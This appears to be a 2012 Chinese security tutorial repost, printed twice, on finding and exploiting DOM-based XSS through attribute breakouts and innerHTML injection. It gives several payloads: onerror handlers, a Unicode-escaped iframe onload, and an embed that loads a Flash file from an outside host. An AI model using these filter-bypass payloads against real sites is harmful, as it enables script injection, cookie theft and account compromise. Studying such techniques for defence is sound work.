關(guān)于DOM xss跨站的一點(diǎn)點(diǎn)經(jīng)驗(yàn)之談
發(fā)布時(shí)間:2012-06-18 09:26:22 作者:佚名
我要評論

Xss的危害各位小牛 大牛們都意識到了Xss開始的csrf和掛馬 到盜cookies和ajax 到xssshell 還有各種利用....
Xss的危害各位小牛 大牛們都意識到了Xss開始的csrf和掛馬 到盜cookies和ajax 到xssshell 還有各種利用....
我們一般找到的都是大多數(shù)都停留在找直接輸入輸出上,這類型的一般很容易被過濾。
隱蔽型的就是DOM xss了.
也就是不是直接輸出的,

換句話話說,輸出內(nèi)容,在源代碼里看不到.
比如你這里這個(gè)的話, 你右鍵,查看源代碼的話 內(nèi)容都是直接可以看到的這種就是直接 輸入輸出的
這個(gè)就是直接輸出類型
對于查找DOM XSS的基本方法:
一般是這樣的, 先發(fā)一個(gè)正常的內(nèi)容,
然后F12打開調(diào)試工具(火狐Firebug插件);
定位到你發(fā)的內(nèi)容上,調(diào)試工具里,有一個(gè)箭頭,可以選擇網(wǎng)頁里指定的位置的.
然后看你發(fā)送的內(nèi)容里 有沒有什么隱藏的屬性 或自定義屬性
哦 通常的情況是<a href="xxx" title="你輸入的某句話">xxxxxxx</a>
而且,“你輸入的某句話” ,你直接查看源代碼是看不到的
換句話說, <a href="xxx" title="你輸入的某句話">xxxxxxx</a> 這個(gè) 是被動(dòng)態(tài)產(chǎn)生的
這個(gè)時(shí)候,就有潛在的問題來了。 如果 “你輸入的某句話” 寫為xxxxxxxxx"><img><"
會(huì)變成<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a>
就會(huì)插入一個(gè)HTML標(biāo)簽進(jìn)去了
但是 實(shí)際情況下," , > 都是被過濾的(到了這里一般的黑友會(huì)說轉(zhuǎn)義了過濾了啊沒得突破了-_-我曾經(jīng)也是這樣)
你輸入的某句話 寫為
xxxxxxxxx"><img><"
由于是動(dòng)態(tài)產(chǎn)生的 最后" 會(huì)自動(dòng)變?yōu)?quot; 大家覺得很奇怪吧等下解釋
>---> >
< ----> <所以最后效果還是<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> (而且很多程序員,沒有過濾& )
下面我們本地測試下
<div id="m">x</div>
<script>
var x="內(nèi)容";
document.getElementById("m").innerHTML=x;
</script>
內(nèi)容就是我們輸入的內(nèi)容如<script> <iframe>各種標(biāo)簽= =,這些在一般網(wǎng)站輸入都被過濾了的 對< ' ">等等各種轉(zhuǎn)義了的話,我們突破就很難.
測試一下
<script>
function test(n){
alert(n);}
</script> www.dbjr.com.cn
<img src="1" onerror="test('gainover')"></img>
<img src="1" onerror="test('gainover');+function(){alert(/xx/)}()//')"></img>'
一個(gè)編碼列子再給大家寫個(gè)列子
<div id="y"></div>
<img id="x" class="audio" src="xxxx" border="0" alt="mp3;http://xsst.sinaapp.com/Xss.swf"><embed src="http://xsst.sinaapp.com/Xss.swf"type="application/x-shockwave-flash"allowscriptaccess="always"><#.mp3"></p> <script>
document.getElementById("y").innerHTML=document.getElementById("x").alt;
</script>xxx.innerHTML= yyy.
某個(gè)屬性- -成功編碼繞過("="=')編碼問題不是我開發(fā)的別問我了-_-~!
我們還可以這樣來測試下
<div id="m">x</div>
<script>
var x="\u003ciframe onload=alert(1)\u003e";
document.getElementById("m").innerHTML=x;
</script>
Unicode字符列表:http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8
Xss安全測試字符轉(zhuǎn)換工具:http://app.baidu.com/app/enter?appid=280383
作者 90sec
我們一般找到的都是大多數(shù)都停留在找直接輸入輸出上,這類型的一般很容易被過濾。
隱蔽型的就是DOM xss了.
也就是不是直接輸出的,

換句話話說,輸出內(nèi)容,在源代碼里看不到.
比如你這里這個(gè)的話, 你右鍵,查看源代碼的話 內(nèi)容都是直接可以看到的這種就是直接 輸入輸出的
這個(gè)就是直接輸出類型
對于查找DOM XSS的基本方法:
一般是這樣的, 先發(fā)一個(gè)正常的內(nèi)容,
然后F12打開調(diào)試工具(火狐Firebug插件);
定位到你發(fā)的內(nèi)容上,調(diào)試工具里,有一個(gè)箭頭,可以選擇網(wǎng)頁里指定的位置的.
然后看你發(fā)送的內(nèi)容里 有沒有什么隱藏的屬性 或自定義屬性
哦 通常的情況是<a href="xxx" title="你輸入的某句話">xxxxxxx</a>
而且,“你輸入的某句話” ,你直接查看源代碼是看不到的
換句話說, <a href="xxx" title="你輸入的某句話">xxxxxxx</a> 這個(gè) 是被動(dòng)態(tài)產(chǎn)生的
這個(gè)時(shí)候,就有潛在的問題來了。 如果 “你輸入的某句話” 寫為xxxxxxxxx"><img><"
會(huì)變成<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a>
就會(huì)插入一個(gè)HTML標(biāo)簽進(jìn)去了
但是 實(shí)際情況下," , > 都是被過濾的(到了這里一般的黑友會(huì)說轉(zhuǎn)義了過濾了啊沒得突破了-_-我曾經(jīng)也是這樣)
你輸入的某句話 寫為
xxxxxxxxx"><img><"
由于是動(dòng)態(tài)產(chǎn)生的 最后" 會(huì)自動(dòng)變?yōu)?quot; 大家覺得很奇怪吧等下解釋
>---> >
< ----> <所以最后效果還是<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> (而且很多程序員,沒有過濾& )
下面我們本地測試下
復(fù)制代碼
代碼如下:<div id="m">x</div>
<script>
var x="內(nèi)容";
document.getElementById("m").innerHTML=x;
</script>
內(nèi)容就是我們輸入的內(nèi)容如<script> <iframe>各種標(biāo)簽= =,這些在一般網(wǎng)站輸入都被過濾了的 對< ' ">等等各種轉(zhuǎn)義了的話,我們突破就很難.
測試一下
復(fù)制代碼
代碼如下:<script>
function test(n){
alert(n);}
</script> www.dbjr.com.cn
<img src="1" onerror="test('gainover')"></img>
<img src="1" onerror="test('gainover');+function(){alert(/xx/)}()//')"></img>'
一個(gè)編碼列子再給大家寫個(gè)列子
復(fù)制代碼
代碼如下:<div id="y"></div>
<img id="x" class="audio" src="xxxx" border="0" alt="mp3;http://xsst.sinaapp.com/Xss.swf"><embed src="http://xsst.sinaapp.com/Xss.swf"type="application/x-shockwave-flash"allowscriptaccess="always"><#.mp3"></p> <script>
document.getElementById("y").innerHTML=document.getElementById("x").alt;
</script>xxx.innerHTML= yyy.
某個(gè)屬性- -成功編碼繞過("="=')編碼問題不是我開發(fā)的別問我了-_-~!
我們還可以這樣來測試下
復(fù)制代碼
代碼如下:<div id="m">x</div>
<script>
var x="\u003ciframe onload=alert(1)\u003e";
document.getElementById("m").innerHTML=x;
</script>
Unicode字符列表:http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8
Xss安全測試字符轉(zhuǎn)換工具:http://app.baidu.com/app/enter?appid=280383
作者 90sec
相關(guān)文章
- 今天在盛大云看到一個(gè)不錯(cuò)的防止ssh暴力破解的帖子,轉(zhuǎn)過來和大家分享下,主要是依靠denyhost軟件。穩(wěn)重所講的是下載安裝包安裝,實(shí)際上可以從直接使用yum或者apt安裝,找2012-09-04
- 一些經(jīng)典的XSS跨站代碼整理2012-07-06
關(guān)于星外虛擬機(jī)+D盾提權(quán)的艱難過程(圖)
本文主要介紹了星外虛擬機(jī)+D盾提權(quán)的主要過程2012-06-04網(wǎng)絡(luò)連接的本地連接右鍵菜單的修復(fù)命令
在網(wǎng)絡(luò)連接的本地連接右鍵菜單中有一個(gè)“修復(fù)”命令,我們平時(shí)可能很少用到。其實(shí)這個(gè)“修復(fù)”功能在某些時(shí)候可有不小的作用,下面就向大家介紹其兩個(gè)應(yīng)用。2009-07-22VISTA系統(tǒng)下如何啟動(dòng)及查看無線網(wǎng)絡(luò)配置
VISTA系統(tǒng)下啟動(dòng)及查看無線網(wǎng)絡(luò)配置的圖文教程2012-05-11- 分布式拒絕服務(wù)攻擊(DDoS)是目前黑客經(jīng)常采用而難以防范的攻擊手段。它的英文全稱為Distributed Denial of Service。2012-07-20
- 經(jīng)典高招打造自己的超級電腦防火墻網(wǎng)絡(luò)安全中談到個(gè)人上網(wǎng)時(shí)的安全,還是先把大家可能會(huì)遇到的問題歸個(gè)類吧。2011-02-27
- DDoS攻擊是利用一批受控制的機(jī)器向一臺機(jī)器發(fā)起攻擊,這樣來勢迅猛的攻擊令人難以防備,因此具有較大的破壞性2012-11-16
現(xiàn)代網(wǎng)絡(luò)性能監(jiān)控工具應(yīng)具備何種技能?網(wǎng)絡(luò)與應(yīng)用程序監(jiān)控
大家都知道現(xiàn)在市場上的網(wǎng)絡(luò)性能監(jiān)控工具大有所在,這為現(xiàn)在的IT行業(yè)的人員提供了很多便利,幫助IT管理團(tuán)隊(duì)監(jiān)控網(wǎng)絡(luò)性能,并且?guī)椭鶬T管理人員確定系統(tǒng)性能的瓶頸所在,進(jìn)而2016-10-19